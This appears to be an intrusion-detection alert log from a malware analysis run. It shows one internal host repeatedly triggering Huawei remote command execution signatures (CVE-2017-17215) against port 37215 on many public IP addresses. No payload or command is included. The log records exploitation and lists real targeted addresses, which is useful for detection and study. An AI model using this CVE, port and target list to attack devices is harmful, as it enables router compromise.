                                                    07/10/24-08:27:10.601201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883037215192.168.2.14157.135.45.79
                                                    07/10/24-08:26:41.593375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646837215192.168.2.14197.174.246.24
                                                    07/10/24-08:26:13.850183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459837215192.168.2.14147.231.112.248
                                                    07/10/24-08:27:28.046169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595037215192.168.2.1468.248.162.126
                                                    07/10/24-08:26:55.386959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362037215192.168.2.14157.52.112.43
                                                    07/10/24-08:26:25.519002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272637215192.168.2.14194.142.132.126
                                                    07/10/24-08:26:59.551193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558637215192.168.2.1492.97.121.179
                                                    07/10/24-08:27:00.565253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931037215192.168.2.14157.48.32.242
                                                    07/10/24-08:27:13.834773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400637215192.168.2.14157.252.219.91
                                                    07/10/24-08:27:23.948745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902037215192.168.2.14157.154.171.217
                                                    07/10/24-08:26:49.850247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388237215192.168.2.14157.118.124.248
                                                    07/10/24-08:27:02.952758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485437215192.168.2.14157.138.9.161
                                                    07/10/24-08:27:27.147329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333437215192.168.2.1437.158.197.242
                                                    07/10/24-08:26:47.941431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.1441.159.162.222
                                                    07/10/24-08:27:19.299032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685437215192.168.2.14135.105.25.169
                                                    07/10/24-08:27:28.064237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941837215192.168.2.14197.131.106.57
                                                    07/10/24-08:26:38.559364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874637215192.168.2.1438.47.236.143
                                                    07/10/24-08:26:41.400460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331437215192.168.2.14197.140.152.36
                                                    07/10/24-08:26:20.090184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763037215192.168.2.14157.126.67.151
                                                    07/10/24-08:26:55.277913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446037215192.168.2.14157.136.155.68
                                                    07/10/24-08:27:32.548179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516837215192.168.2.14157.160.205.20
                                                    07/10/24-08:27:19.289201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796037215192.168.2.14157.223.13.108
                                                    07/10/24-08:27:22.890636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643237215192.168.2.14197.71.189.169
                                                    07/10/24-08:27:17.044881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715237215192.168.2.14197.39.228.163
                                                    07/10/24-08:26:57.667245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078837215192.168.2.14146.221.69.224
                                                    07/10/24-08:27:19.298148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726437215192.168.2.14157.255.64.50
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282037215192.168.2.14143.91.85.137
                                                    07/10/24-08:26:29.847797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886237215192.168.2.1441.27.121.32
                                                    07/10/24-08:27:14.834024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572637215192.168.2.14197.175.159.164
                                                    07/10/24-08:26:25.478512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915637215192.168.2.14197.92.96.197
                                                    07/10/24-08:26:41.557589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491437215192.168.2.14197.0.96.54
                                                    07/10/24-08:27:07.365607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230837215192.168.2.14197.122.111.127
                                                    07/10/24-08:27:31.527963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411237215192.168.2.14197.177.133.118
                                                    07/10/24-08:27:22.929262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754037215192.168.2.14187.136.161.30
                                                    07/10/24-08:26:17.974548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347837215192.168.2.1453.218.247.119
                                                    07/10/24-08:27:08.415225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837837215192.168.2.1441.182.242.35
                                                    07/10/24-08:26:13.785071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678637215192.168.2.14142.36.169.221
                                                    07/10/24-08:27:10.717127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762437215192.168.2.14157.24.25.240
                                                    07/10/24-08:27:17.005251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663037215192.168.2.14142.232.160.167
                                                    07/10/24-08:27:33.849531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860837215192.168.2.1441.108.149.232
                                                    07/10/24-08:27:22.891775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703237215192.168.2.1423.92.189.145
                                                    07/10/24-08:26:25.502645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824037215192.168.2.14187.194.250.245
                                                    07/10/24-08:27:36.290826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773837215192.168.2.1486.59.214.156
                                                    07/10/24-08:26:38.596946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808037215192.168.2.1483.53.47.64
                                                    07/10/24-08:27:27.036328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952037215192.168.2.14157.73.104.147
                                                    07/10/24-08:27:10.591175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253837215192.168.2.14145.21.255.28
                                                    07/10/24-08:26:29.851585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838837215192.168.2.14157.98.214.125
                                                    07/10/24-08:27:22.777206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168837215192.168.2.14157.157.55.156
                                                    07/10/24-08:26:43.702243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090237215192.168.2.14197.89.183.136
                                                    07/10/24-08:26:41.375610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362437215192.168.2.14157.129.57.192
                                                    07/10/24-08:26:41.360429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773437215192.168.2.14208.107.225.67
                                                    07/10/24-08:27:10.723777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692037215192.168.2.14197.36.21.54
                                                    07/10/24-08:27:17.092016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813037215192.168.2.14197.84.107.146
                                                    07/10/24-08:26:17.949635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237637215192.168.2.14157.241.116.244
                                                    07/10/24-08:26:14.764309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279837215192.168.2.14157.55.211.110
                                                    07/10/24-08:26:36.343615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968437215192.168.2.14197.133.196.153
                                                    07/10/24-08:26:51.932459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933437215192.168.2.14197.36.207.103
                                                    07/10/24-08:26:31.108288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058237215192.168.2.14157.74.19.184
                                                    07/10/24-08:26:55.432680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830037215192.168.2.14161.184.41.18
                                                    07/10/24-08:26:43.864368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436237215192.168.2.14197.100.137.117
                                                    07/10/24-08:26:22.213978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479437215192.168.2.14170.9.41.10
                                                    07/10/24-08:26:52.043481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556437215192.168.2.14210.228.227.188
                                                    07/10/24-08:26:29.781347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926837215192.168.2.1481.125.251.14
                                                    07/10/24-08:27:33.880415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398837215192.168.2.14197.232.138.204
                                                    07/10/24-08:27:19.198871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590837215192.168.2.1441.193.42.162
                                                    07/10/24-08:27:31.457476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274037215192.168.2.14157.43.73.192
                                                    07/10/24-08:26:20.173422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959837215192.168.2.1441.109.176.145
                                                    07/10/24-08:26:20.182553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600837215192.168.2.14197.51.168.199
                                                    07/10/24-08:27:31.454702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083037215192.168.2.1457.61.2.248
                                                    07/10/24-08:27:33.734254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257837215192.168.2.1466.4.133.15
                                                    07/10/24-08:26:11.538222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751637215192.168.2.145.10.195.125
                                                    07/10/24-08:26:28.895682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974037215192.168.2.14197.89.161.73
                                                    07/10/24-08:26:42.422787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074837215192.168.2.14147.124.220.153
                                                    07/10/24-08:27:02.939930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496037215192.168.2.1441.242.227.174
                                                    07/10/24-08:27:02.811235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092237215192.168.2.14197.151.93.208
                                                    07/10/24-08:26:20.123925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676237215192.168.2.1441.199.186.188
                                                    07/10/24-08:27:17.041002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889237215192.168.2.14103.195.25.107
                                                    07/10/24-08:26:29.860241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756037215192.168.2.1441.155.140.105
                                                    07/10/24-08:26:43.888135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300637215192.168.2.1439.28.44.113
                                                    07/10/24-08:26:52.002516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512437215192.168.2.1441.58.103.146
                                                    07/10/24-08:26:55.421608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932437215192.168.2.14157.193.31.135
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015437215192.168.2.1441.147.27.94
                                                    07/10/24-08:26:25.525580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489437215192.168.2.14157.236.131.200
                                                    07/10/24-08:26:59.605859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342637215192.168.2.14197.10.247.163
                                                    07/10/24-08:27:02.815601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933037215192.168.2.14157.207.203.247
                                                    07/10/24-08:26:17.933162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289037215192.168.2.14157.151.162.70
                                                    07/10/24-08:26:55.393096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905437215192.168.2.14197.77.19.103
                                                    07/10/24-08:27:24.988498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821837215192.168.2.1441.12.103.129
                                                    07/10/24-08:27:24.997757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218837215192.168.2.14204.197.141.222
                                                    07/10/24-08:26:28.834166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669437215192.168.2.14157.121.238.188
                                                    07/10/24-08:26:57.654804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132837215192.168.2.1462.69.186.213
                                                    07/10/24-08:27:20.513537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822837215192.168.2.14197.84.253.18
                                                    07/10/24-08:26:43.910863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116437215192.168.2.14197.62.146.202
                                                    07/10/24-08:26:51.943122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341037215192.168.2.14197.173.251.158
                                                    07/10/24-08:26:51.979399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282437215192.168.2.14157.213.250.182
                                                    07/10/24-08:27:27.165580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635237215192.168.2.14197.30.74.120
                                                    07/10/24-08:26:18.008583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001837215192.168.2.1454.145.99.45
                                                    07/10/24-08:27:13.983533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527037215192.168.2.14221.22.86.164
                                                    07/10/24-08:26:34.194125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566237215192.168.2.1441.138.172.4
                                                    07/10/24-08:26:31.067325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354637215192.168.2.1450.144.20.191
                                                    07/10/24-08:27:24.891273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248237215192.168.2.14157.93.239.140
                                                    07/10/24-08:27:30.487311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893637215192.168.2.1441.43.36.105
                                                    07/10/24-08:27:13.993407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392237215192.168.2.14197.248.143.71
                                                    07/10/24-08:27:19.250416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234637215192.168.2.14157.204.121.24
                                                    07/10/24-08:26:15.811251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023437215192.168.2.14197.170.6.163
                                                    07/10/24-08:26:52.070020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038637215192.168.2.14197.110.251.100
                                                    07/10/24-08:26:41.585181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696637215192.168.2.14197.114.240.215
                                                    07/10/24-08:26:29.773841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695437215192.168.2.14157.254.117.6
                                                    07/10/24-08:27:02.876445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313837215192.168.2.14157.175.16.34
                                                    07/10/24-08:26:43.913134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236037215192.168.2.1427.103.238.69
                                                    07/10/24-08:27:22.799639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523637215192.168.2.1441.175.126.196
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624437215192.168.2.1485.59.239.104
                                                    07/10/24-08:26:17.991529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969437215192.168.2.14197.89.168.163
                                                    07/10/24-08:26:55.413827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482037215192.168.2.1483.135.8.130
                                                    07/10/24-08:27:24.985108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812837215192.168.2.14193.225.26.244
                                                    07/10/24-08:26:41.335427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561037215192.168.2.14197.201.95.42
                                                    07/10/24-08:27:02.878785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501637215192.168.2.1447.139.163.240
                                                    07/10/24-08:26:22.283618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576637215192.168.2.14157.114.147.148
                                                    07/10/24-08:27:11.540187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719437215192.168.2.14197.101.104.3
                                                    07/10/24-08:27:19.286417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.14157.223.121.174
                                                    07/10/24-08:26:47.851082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694837215192.168.2.1441.12.65.134
                                                    07/10/24-08:26:20.104603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685637215192.168.2.14197.16.247.4
                                                    07/10/24-08:26:53.177973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700437215192.168.2.14197.14.43.202
                                                    07/10/24-08:27:08.367822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126437215192.168.2.14197.75.22.156
                                                    07/10/24-08:27:23.937320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755037215192.168.2.14157.214.40.134
                                                    07/10/24-08:26:43.781564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649637215192.168.2.14197.87.57.5
                                                    07/10/24-08:27:31.538711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738837215192.168.2.14197.177.60.213
                                                    07/10/24-08:27:24.867570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193037215192.168.2.1431.40.194.106
                                                    07/10/24-08:27:30.510690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507037215192.168.2.14143.41.112.140
                                                    07/10/24-08:26:59.790586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435637215192.168.2.14212.234.158.166
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565037215192.168.2.1482.75.119.86
                                                    07/10/24-08:26:59.766044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631037215192.168.2.14170.157.166.171
                                                    07/10/24-08:26:43.613127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432637215192.168.2.14197.177.105.202
                                                    07/10/24-08:27:13.995409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098037215192.168.2.1441.3.64.99
                                                    07/10/24-08:27:23.896326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542237215192.168.2.14197.241.231.117
                                                    07/10/24-08:26:41.539948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814637215192.168.2.14197.253.61.210
                                                    07/10/24-08:26:20.134234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973637215192.168.2.14197.174.34.2
                                                    07/10/24-08:27:30.417770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797437215192.168.2.14173.173.140.123
                                                    07/10/24-08:26:22.289116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913437215192.168.2.14151.247.105.18
                                                    07/10/24-08:26:29.855668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324237215192.168.2.1444.82.221.138
                                                    07/10/24-08:26:36.375708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087837215192.168.2.14108.225.153.70
                                                    07/10/24-08:27:19.259031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253637215192.168.2.1441.22.123.150
                                                    07/10/24-08:26:20.080140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073037215192.168.2.14197.201.142.164
                                                    07/10/24-08:26:34.202550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198637215192.168.2.1439.98.61.235
                                                    07/10/24-08:26:28.886880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3642837215192.168.2.14157.160.4.24
                                                    07/10/24-08:27:23.960420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013637215192.168.2.14167.195.221.159
                                                    07/10/24-08:27:27.136540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.1441.131.125.240
                                                    07/10/24-08:27:10.767328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627837215192.168.2.14197.12.181.48
                                                    07/10/24-08:26:43.655824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339637215192.168.2.1441.110.120.130
                                                    07/10/24-08:27:23.934350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881237215192.168.2.14197.170.177.226
                                                    07/10/24-08:27:11.484487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446037215192.168.2.14197.76.94.224
                                                    07/10/24-08:27:20.412870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284237215192.168.2.14197.221.0.196
                                                    07/10/24-08:26:59.657885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663037215192.168.2.1441.219.183.79
                                                    07/10/24-08:26:43.915095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007237215192.168.2.14219.162.152.112
                                                    07/10/24-08:26:33.156135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335037215192.168.2.1499.137.135.76
                                                    07/10/24-08:26:51.970801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158437215192.168.2.14197.168.206.34
                                                    07/10/24-08:26:22.289116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769037215192.168.2.14197.91.247.12
                                                    07/10/24-08:26:26.483637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368437215192.168.2.14197.58.21.63
                                                    07/10/24-08:26:49.792004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219437215192.168.2.1441.43.217.197
                                                    07/10/24-08:26:49.811363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680837215192.168.2.14157.125.141.122
                                                    07/10/24-08:26:49.854834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200037215192.168.2.14157.23.32.98
                                                    07/10/24-08:27:32.556430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470237215192.168.2.14197.255.62.140
                                                    07/10/24-08:26:25.486596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522637215192.168.2.1412.227.213.47
                                                    07/10/24-08:26:11.525491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168037215192.168.2.14197.26.218.26
                                                    07/10/24-08:26:28.781471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738437215192.168.2.14197.168.102.126
                                                    07/10/24-08:27:13.837661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574037215192.168.2.14138.162.52.229
                                                    07/10/24-08:26:15.806534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586037215192.168.2.14118.186.32.179
                                                    07/10/24-08:26:26.498408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455837215192.168.2.14197.59.113.214
                                                    07/10/24-08:27:28.183370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601837215192.168.2.1441.54.65.19
                                                    07/10/24-08:26:20.156560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443637215192.168.2.142.119.205.203
                                                    07/10/24-08:26:20.132351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067437215192.168.2.14197.48.58.249
                                                    07/10/24-08:26:34.220907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306837215192.168.2.14197.197.114.253
                                                    07/10/24-08:26:26.563571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721237215192.168.2.14157.79.119.229
                                                    07/10/24-08:27:17.098663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030037215192.168.2.14157.149.175.4
                                                    07/10/24-08:26:41.477028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257637215192.168.2.14197.210.222.169
                                                    07/10/24-08:27:08.427653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785237215192.168.2.1441.83.87.106
                                                    07/10/24-08:27:17.064764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463637215192.168.2.14157.225.132.249
                                                    07/10/24-08:26:49.815817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732637215192.168.2.1441.247.86.49
                                                    07/10/24-08:26:11.592748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923837215192.168.2.1481.152.255.200
                                                    07/10/24-08:26:49.900161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898837215192.168.2.14157.178.190.199
                                                    07/10/24-08:26:15.862104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691237215192.168.2.14153.151.82.223
                                                    07/10/24-08:26:43.722420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073237215192.168.2.14197.110.70.186
                                                    07/10/24-08:27:17.104843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564837215192.168.2.1441.199.123.42
                                                    07/10/24-08:27:14.867755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501837215192.168.2.1441.115.30.28
                                                    07/10/24-08:27:34.131322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985237215192.168.2.14197.40.211.135
                                                    07/10/24-08:27:22.810322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882837215192.168.2.14157.115.191.125
